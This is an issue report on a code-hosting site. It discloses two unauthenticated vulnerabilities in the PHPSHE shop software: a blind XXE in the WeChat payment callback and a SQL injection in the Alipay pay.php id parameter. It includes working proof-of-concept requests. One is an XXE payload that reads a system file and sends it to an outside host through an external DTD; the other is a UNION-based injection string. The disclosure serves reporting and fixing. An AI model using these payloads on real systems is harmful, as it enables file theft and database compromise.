Watch 15 Star 35 Fork 17

koyshe / phpshePHP

Two vulnerabiliyies without authentication

Open
wps2015  Created at

0x01 blind XXE in /include/plugin/payment/wechat/notify_url.php

The XXE vulnerability is located in include/plugin/payment/wechat/notify_url.php, wechat_getxml function is called.
输入图片说明

wechat_getxml function is defined in hook/wechat.hook.php ,then pe_getxmlfunction is called.

输入图片说明

pe_getxml function is defined in include/function/global.func.php。simplexml_load_string() function is called to parse the xml from php://input. If the version of libxml lib < 2.9.0, simplexml_load_string() will parse the external entity in the default mod.

输入图片说明

the poc is as below:

/phpshe1.7/include/plugin/payment/wechat/notify_url.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
...
Content-Type: application/xml
Content-Length: 257

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yoursite.com/test.dtd">
%dtd;
]>
<roottag>&send;</roottag>

test.dtd:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://dnslog.com/?%file;'>">
%all;

We can use it to read any file in the system.

0x02 SQL Injection in include/plugin/payment/alipay/pay.php with parameter id

The vulnerability is located in include/plugin/payment/alipay/pay.php and $order_id can be controlled.

输入图片说明

Then the renturn value of order_table will be directly spliced into SQL statements as table name.

输入图片说明

So the poc is as below:

/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12%23_

输入图片说明

total 1 participants

Comments (0)

Sign in and comment

Assignee
Labels
Not set
Project
Milestone
Branch
Scheduled start
Not set
Scheduled end
Not set
Top level
Priority

Help Search

Gitee_sixth 5th_float_left_close